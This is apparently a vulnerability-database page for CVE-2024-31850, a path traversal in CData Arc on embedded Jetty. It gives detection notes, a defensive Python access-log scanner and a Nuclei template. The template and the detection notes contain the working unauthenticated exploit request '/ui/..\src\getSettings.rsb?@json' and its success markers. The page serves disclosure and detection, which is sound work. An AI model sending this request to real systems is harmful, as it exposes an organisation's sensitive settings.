CVE-2024-31850
Published 2024-04-05
Priority: P2 · 65 · high · 8.6 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
EXPLOIT
EPSS: 3.04% (85.9th percentile)
A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cdata | arc | < 23.4.8839 | 23.4.8839 |
Detection & IOCs (extracted from sources)
- Detect path traversal attempts that use backslash characters in the URI and target CData Arc: look for requests whose URL path contains '/..' and '\src\' patterns, which Jetty, unlike Tomcat, does not reject.
- Alert on HTTP 200 responses to requests for '/ui/..\src\getSettings.rsb?@json' — a successful exploit returns Content-Type: application/json with a body containing 'items', 'true', and 'notifyemail'.
- The exploit bypasses the security constraints defined in web.xml by routing through the /ui/ path prefix combined with backslash-based directory traversal; monitor servlet access logs for /ui/ requests that resolve to /src/ endpoints.
- The vulnerability only affects the Java version of CData Arc when deployed with the embedded Jetty server; deployments on Tomcat are NOT vulnerable, because Tomcat rejects backslash characters in URIs.
- Only CData Arc versions below 23.4.8839 are affected; patched versions mitigate the issue.
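As an added example (not code from this page or from CData), the following Python scanner applies the detection items above to access-log lines: it flags backslashes and dot-dot segments in the request path, resolves the path the way a container that treats a backslash as a separator effectively does (so a /ui/ request is seen landing under /src/), and marks 200 responses as likely successful. The log lines are constructed for the example; the Common Log Format parsing and the `classify`/`scan_log` names are assumptions, not anything from CData Arc or the Nuclei project.

```python
"""Flag backslash-based path traversal attempts (CVE-2024-31850 pattern) in HTTP access logs.

Constructed example for this page: the log lines below are made up and the
parsing assumes Common Log Format (only method, path and status are used).
"""
import posixpath
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = [
    r'198.51.100.7 - - [05/Apr/2024:10:00:01 +0000] "GET /ui/login.rsb HTTP/1.1" 200 5120',
    r'198.51.100.7 - - [05/Apr/2024:10:00:02 +0000] "GET /ui/..\src\getSettings.rsb?@json HTTP/1.1" 200 2048',
    r'203.0.113.9 - - [05/Apr/2024:10:00:03 +0000] "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1" 404 312',
    r'203.0.113.9 - - [05/Apr/2024:10:00:04 +0000] "GET /ui/..\src\getSettings.rsb?@json HTTP/1.1" 400 0',
    r'198.51.100.7 - - [05/Apr/2024:10:00:05 +0000] "GET /src/getSettings.rsb?@json HTTP/1.1" 200 2048',
]


def raw_path(target: str) -> str:
    """Percent-decoded path component of a request target (query and fragment dropped)."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    return unquote(path)


def resolve_target(target: str) -> str:
    """Resolve the path as a container that treats '\\' like '/' would:
    decode, turn backslashes into slashes, then collapse '.' and '..' segments.
    This is what turns the /ui/ request into a /src/ endpoint."""
    path = raw_path(target).replace("\\", "/")
    return posixpath.normpath(path)


def classify(target: str):
    """Return the reasons a request target looks like a traversal attempt
    (empty list means nothing suspicious)."""
    path = raw_path(target)
    reasons = []
    if "\\" in path:
        reasons.append("backslash in path")
    if re.search(r"(^|[/\\])\.\.([/\\]|$)", path):
        reasons.append("dot-dot segment")
    resolved = resolve_target(target)
    if path.startswith("/ui/") and resolved.startswith("/src/"):
        reasons.append("/ui/ request resolves to " + resolved)
    return reasons


def scan_log(lines):
    """Scan access-log lines and return one finding per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Common Log Format; skip rather than guess
        reasons = classify(m["target"])
        if not reasons:
            continue
        status = int(m["status"])
        hits.append({
            "host": m["host"],
            "target": m["target"],
            "status": status,
            "reasons": reasons,
            # A 200 on a traversal request means the container served it
            # (the condition the Nuclei matcher on this page checks);
            # 400/404 means the request was rejected.
            "likely_success": status == 200,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flag = "LIKELY SUCCESS" if hit["likely_success"] else "blocked"
        print(f'{hit["host"]} {hit["status"]} {hit["target"]} -> {flag}: {", ".join(hit["reasons"])}')
```

Run on the constructed sample, the scanner reports three traversal attempts: the backslash request that was answered with 200 (likely successful), its percent-encoded variant answered with 404, and a repeat answered with 400 (the Tomcat-style rejection). The plain /ui/login.rsb request and the direct /src/getSettings.rsb request carry no traversal markers and are not reported, so the rule keys on the traversal itself rather than on the endpoint name.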
No detection rules found.
Nuclei
CData Arc < 23.4.8839 - Path Traversal (nuclei · CVSS 9.8)
CVE-2024-31850 [CRITICAL] CData Arc < 23.4.8839 - Path Traversal
```yaml
- raw:
    - |
      GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
      Host: {{Hostname}}
      Referer: {{RootURL}}

  matchers-condition: and
  matchers:
    - type: word
      part: body
      words:
        - '"items":[{'
        - ':"true"'
        - 'notifyemail'
      condition: and

    - type: word
      part: header
      words:
        - 'application/json'

    - type: status
      status:
        - 200
# digest: 4a0a00473045022100fd4f4dce11d5e9e54734cfa2255cc7df84f383db73a1e6587a0dd321731ed85102204d79f9a8f301d89cade46c01b7d10c05516b04f35e9991a28e70e136859b650f:922c64590222798bb761d5b6d8e72950
```